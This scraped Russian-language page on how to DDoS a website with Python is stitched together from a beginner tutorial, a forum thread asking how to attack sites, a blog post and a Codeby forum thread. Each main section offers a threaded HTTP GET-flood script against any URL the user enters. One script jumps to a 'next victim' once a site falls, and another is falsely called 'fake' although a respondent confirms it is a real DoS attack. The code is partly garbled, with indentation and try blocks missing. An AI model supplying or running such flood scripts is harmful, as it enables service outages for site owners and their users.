Как задудосить сайт на питон
Перейти к содержимому

Как задудосить сайт на питон

  • автор:

DOS атака на Python для самых маленьких

Сегодня мы разберемся что такое DOS, DDOS, а так же научимся проводить простейшую DOS атаку.

И так, что же такое DOS и DDOS атаки? Разберем это на знакомом примере.

Идет урок математики, один из учеников делает что-нибудь раздражающее, что начинает мешать училке, вести урок, однако, если нашего дорогого ученика вычислит училка,

у него в дневнике появится моднейшая «2» за поведение, а наш одноклассник отправляется в корридор.

Примерно по такому же принципу проводится DOS атака, одна машина, пишем скрипт, который будет сильно нагружать поток и препятствовать нормальной работе сайта.

У нас может получиться положить сайт, но не на долго, если получится вообще, потому что отследить такое вмешательство не сложно.

А теперь возьмем в пример тот же урок математики, но мешает училке уже не один человек, а весь класс — урок сорван.

Так же и с DDOS атаками, атака проводится не с одного устройства, а с тысяч, сотен тысяч, может быть даже миллионов, противостоять этому невозможно, только если

администрация дернет рубильник, таким образом сайт можно похоронить так, что он потом не поднимется вообще.

Сегодня мы с вами научимся проводить простую DOS атаку, так как, предпологаю, у вас нет многотысячных единомышленников, если какого-нибудь вируса, который вам удалось

распространить на большое количество систем (а если есть, то зачем ты это читаешь, лол?)

И так, нам нужно написать скрипт, который будет пакетами данных засорять поток на удаленной системе, от чего она будет доведена до оргазма(зачеркнуто) отказа и

прекратит свою работу. Нам нужно сделать так, чтобы система не вывозила количество входящщих данных, не успевала их обрабатывать и отвечать на них.

И так, что же нам нужно, для нашего блюда, которым мы накормим неугодную систему:

1. Python3 — тут мы собственно будем писать скрипт.

2. Colorama — не обязательно, нужно для удобства.

3. Requests — обязательно, нужно чтобы отправлять на удаленный сервер запросы post/get

4. Threading — тоже обязательно, обеспечивает многопоточность, многопоточность нужна для увеличения скорости.

Теперь, когда у нас под рукой есть все необходимое, можно и к делу наконец перейти.

1. Делаем импорт библиотек выше, которые вы уже установили (установили ведь, да?)

import colorama
import threading
import requests

2. Пишем функцию, которая будет отправлять ништяки, а также докладывать нам о состоянии пациента:

def dos(target):
while True:
res = requests.get(target)
print(colorama.Fore.YELLOW + "Request sent!" + colorama.Fore.WHITE)
except requests.exceptions.ConnectionError:
print(colorama.Fore.RED + "[+] " + colorama.Fore.LIGHTGREEN_EX + "Connection error!")

С помощью данной функции, мы делаем бесконечный цикл, но нам он не страшен, ведь у нас много потоков. Останется только поддождать, когда сервер ляжет.

Но это еще не все, ведь мы еще не написали основной код:

threads = 20
url = input("URL: ")
threads = int(input("Threads: "))
except ValueError:
exit("Threads count is incorrect!")
if threads == 0:
exit("Threads count is incorrect")
if not url.__contains__("http"):
exit("Invalid domain")
for i in range(0, threads):
thr = threading.Thread(target=dos, args=(url,))
thr.start()
print(str(i + 1) + " thread started!")

А теперь разберемся, что тут у нас вообще происходит. Мы создали переменную threads, в которой мы обозначаем количество потоков. По дефолту у нас стоит 20, это

маловато так что добавляем нолей по вкусу. В переменную url нам нужно вписать домен цели.

Выясняем у пользователя, количество потоков, которое он хотел бы использовать, делаем это в блоке try. Смотрим на количество потоков, если их 0, то у нас ничего не

Далеем убеждаемся, что у нас именно ссылка, делается это по следующим опозновательным признакам: в начале есть http или https, а на конце домен верхнего уровня

И вот, настал тот момент, когда мы все написали (или скопировали), все проверили, нажимаем кнопку F5 (ставь лайк если у тебя есть

такая кнопка, посмотрим сколько

нас), в открывшемся окне бахаем ненавистный нами URL, пишем количество потоков. В окне начинают появляться отчеты, а мы откидываемся на спинку кресла, пьем чай и

Python-сообщество

[RSS Feed]

  • Начало
  • » Python для новичков
  • » DDOS и Python

#1 Авг. 11, 2016 23:51:09

Reijo13 Зарегистрирован: 2016-06-11 Сообщения: 10 Репутация: 0 Профиль Отправить e-mail

DDOS и Python

Как можно устроить ддос атаку на сайт с помощью питона?

#2 Авг. 12, 2016 03:02:53

terabayt От: Киев Зарегистрирован: 2011-11-26 Сообщения: 1099 Репутация: 103 Профиль Отправить e-mail

DDOS и Python

или искать готовые решения
или самому занятся этим вопросом и возможно через полгодика-год вы сможете что-то подобное сделать, но думаю что может и 2
или заплатить какому-то фрилансеру

также можете поискать на форуме
был пост о рекламе сайта по созданию сайтов, кажется, и там кто-то писал код

#3 Авг. 12, 2016 08:46:22

ilnur От: Казань Зарегистрирован: 2009-01-06 Сообщения: 524 Репутация: 22 Профиль Отправить e-mail

DDOS и Python

асинхронные запросы, * кучу процессов, не справятся с этим?
смотря что за сайт конечно

Отредактировано ilnur (Авг. 12, 2016 08:48:33)

#4 Авг. 12, 2016 13:32:43

dmlby Зарегистрирован: 2016-08-11 Сообщения: 1 Репутация: 0 Профиль Отправить e-mail

DDOS и Python

Reijo13
Как можно устроить ддос атаку на сайт с помощью питона?

Тут надо не только питон знать.
Reijo13 у тебя уже был такой опыт на других языка программирования?

#5 Авг. 12, 2016 14:14:06

john123 Зарегистрирован: 2013-12-22 Сообщения: 56 Репутация: 7 Профиль Отправить e-mail

DDOS и Python

Вот так попробуй:

import sys from hacktools import ddos def main(): return ddos.run('http://www.google.com') if __name__ == "__main__": sys.exit(main()) 

Отредактировано john123 (Авг. 12, 2016 14:14:32)

#6 Авг. 12, 2016 14:20:55

JOHN_16 От: Россия, Петропавловск-Камчатск Зарегистрирован: 2010-03-22 Сообщения: 3292 Репутация: 221 Профиль Отправить e-mail

DDOS и Python

да тут не в языках дело
тут надо много чего знать и понимать. А то будет как вот в теме которую уже упоминали, ddos пингами 🙂

_________________________________________________________________________________
полезный блог о python john16blog.blogspot.com

Python и DOS-атаки с помощью библиотеки requests

DOS-атак

DOS-атак

Привет всем! Небольшой пост сегодня, навеянный текущей ситуацией. Будем экспериментировать с DOS-атаками с помощью библиотеки requests в Python.

Длы начала — что такое DOS-атака? Это создание ситуации, когда мы самостоятельно (совсем не эффективно при текущих-то мощностях) или коллективно (о, да!) создаем некоторую нагрузку на атакуемый сервер. Множество запросов, которые заставляют сервер выделять на ответы свои ресурсы приводят к тому, что в итоге сервер оказывается перегружен запросами, и не может обрабатывать те запросы, которые действительно нужны. Так давайте разберемся, как создавать эти запросы? ��

Логика сеогдняшнего кода очень проста — отправляем запрос на сайт и пытаемся получить полный код интересующей нас страницы. Мелочь, но — когда мелочей миллион — сайт начинает тормозить, и в итоге — перестает стабильно работать. Для нашего же компьютера и соединения это — совершенно незаметная нагрузка.

Пример кода — ниже (и да, за тестирование и комментарии спасибо подписчику Льву, который сейчас в Киеве. Там очень сложно, но он не теряет оптимизма — за что ему отдельный респект!):

import requests #подключили библиотеку requests (о ней я писал неоднократно) def get_link(): #Создаем функцию, которая получает ссылку на атакуемый сайт link = input(str('Link: ')) get_content(link) def get_content(link): #Создаем функцию, которая собственно и будет создавать запросы на атакуемый сайт i = 1 while True: try: r = requests.get(link, headers={'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/69.0'}, verify=False) #Поддельный заголовок нашего браузера r_answer = r.content #Создаем переменную, которая состоит из исходного кода страницы print('Отправлено пакетов:', i) #Выводим статистику i = i + 1 except: print('Кажется, сайт', link, 'лежит. Дополнительная проверка. ') #Лег сайт? Проверим на всякий случай :) try: r = requests.get(link, headers={'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/69.0'}, verify=False) r_answer = r.content print('Точно лежит :) Выбираем следующую жертву.') #Точно лег. Давайте выберем следующую жертву? :) get_link() except: print('Точно лежит :) Выбираем следующую жертву.') get_link() while True: get_content(get_link()) get_link()

Спасибо за внимание �� Как всегда — в случае возникновения вопросов пишите на почту или в Telegram.

Завтра постараюсь выкатить версию простейшего атакера, основанного на Ping-запросах в виде оконного приложения (беда современных пользователей компьютеров в том, что бОльшая часть совершенно не умеет пользоваться командной строкой). Слава Украине!

Создание фейковой DoS программы на Python

Всем ахаё ,DoS приселдуюутся законом ,но если вы очень хотите похвастаться перед друзьями какой вы хацкер программист ,то эта программа вам поможет!

import time import os import threading import requests

Это наши импорты (Без них никак!) |^|

# краш сайта работает только если устройство подключено к сети ноута с которого идёт процесс def DosAttack(target): while True: try: rec = requests.get(target) print("Request sent to " + URLOFSITE) except requests.exceptions.ConnectionError: print("[+] " +"error")

Сразу кидаем запросы вверх кода что-бы не забыть. |^|

threads = 50 #time.sleep(0.4)

Подготовка , и сам инпут URL(а) |^|

time.sleep(0.7) os.system('cls')
try: attack = int(input("Threads:")) except ValueError: exit("Site have - ValieError") if attack == 0: exit("Not right") if not URLOFSITE.__contains__("http"): exit('Site Error') if not URLOFSITE.__contains__("."): exit("Site Error")

DoS атака и фэйковые надписи ошибки сайта ,так-же реальные ошибки для правдоподобности

for i in range(0, attack): thr = threading.Thread(target=DosAttack, args=(URLOFSITE,)) thr.start() print(str(i + 1) + " Working") # -->ПОВТОРЮСЬ ЕЩЁ РАЗ ПРОЦЕСС ЛОЖНЫЙ!САЙТ КРАШИТСЯ ИЗ ЗА ВАШЕГО РОУТЕРА ПРОГРАММА ЧТО-БЫ ПЕРЕД ДРУЗЬЯМИ ПОХВАСТАТЬСЯ!!

Ссылка скрыта от гостей

Весь код на Python 3.8.3

import time import os import threading import requests # краш сайта работает только если устройство подключено к сети ноута с которого идёт процесс def DosAttack(target): while True: try: rec = requests.get(target) print("Request sent to " + URLOFSITE) except requests.exceptions.ConnectionError: print("[+] " +"error") threads = 50 #time.sleep(0.4)ПОВТОРЮСЬ ЕЩЁ РАЗ ПРОЦЕСС ЛОЖНЫЙ!САЙТ КРАШИТСЯ ИЗ ЗА ВАШЕГО РОУТЕРА ПРОГРАММА ЧТО-БЫ ПЕРЕД ДРУЗЬЯМИ ПОХВАСТАТЬСЯ!!
Borjomy
Member

30.12.2020 16 0 BIT 0

Если кто не понял что значит фейковая программа,сайт падает если сайт будет открыт с роутера ноута с которого идёт процесс ,по настоящему сайт не падает.

Pernat1y

Red Team
05.04.2018 1 443 134 BIT 0

Borjomy
Member

30.12.2020 16 0 BIT 0
Я уже говорил ,что-бы похваться без каких либо проблем с законом

f22
Codeby Academy

Gold Team
05.05.2019 1 828 225 BIT 898
Я уже говорил ,что-бы похваться без каких либо проблем с законом

Что-то не пойму: суть вашей программы состоит в отправке огромного количества запросов по нужному URI, что это, если не атака?

# -->ПОВТОРЮСЬ ЕЩЁ РАЗ ПРОЦЕСС ЛОЖНЫЙ!САЙТ КРАШИТСЯ ИЗ ЗА ВАШЕГО РОУТЕРА ПРОГРАММА ЧТО-БЫ ПЕРЕД ДРУЗЬЯМИ ПОХВАСТАТЬСЯ!!

А с чего вы это взяли?

краш сайта работает только если устройство подключено к сети ноута с которого идёт процесс
Какое устройство? Какого ноута?

Borjomy
Member

30.12.2020 16 0 BIT 0

Что-то не пойму: суть вашей программы состоит в отправке огромного количества запросов по нужному URI, что это, если не атака?

А с чего вы это взяли?

Какое устройство? Какого ноута?

Окей, при тесте программы сайты падали ,но когда я открыл сайт на телефоне (не через Wi-Fi с которого шёл процесс ) через передачу-данных (Интернет) ,то сайт ровно стоял, хотя как через Wi-Fi сайт падал как

Ссылка скрыта от гостей

.То есть сайт открытый с сети из которого идёт процесс падает ,а сайт открытый из другой сети (как интернет) стоит как всегда.

f22
Codeby Academy

Gold Team
05.05.2019 1 828 225 BIT 898

То есть сайт открытый с сети из которого идёт процесс падает ,а сайт открытый из другой сети (как интернет) стоит как всегда.

Не сайт падает, а пакеты к вам обратно не доходят.
Вы отправляете с атакующего устройства условно 100 пакетов через python скрипт и 1 пакет из браузера.
Сайт/роутер не в состоянии обработать такое количество соединений одновременно, поэтому, вы и не можете увидеть страницу.

Но повторяю, это и есть обыкновенная DoS атака. Малоэффективная, не проработанная, но атака и говорить, что это "процесс ложный" абсолютно ошибочно.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *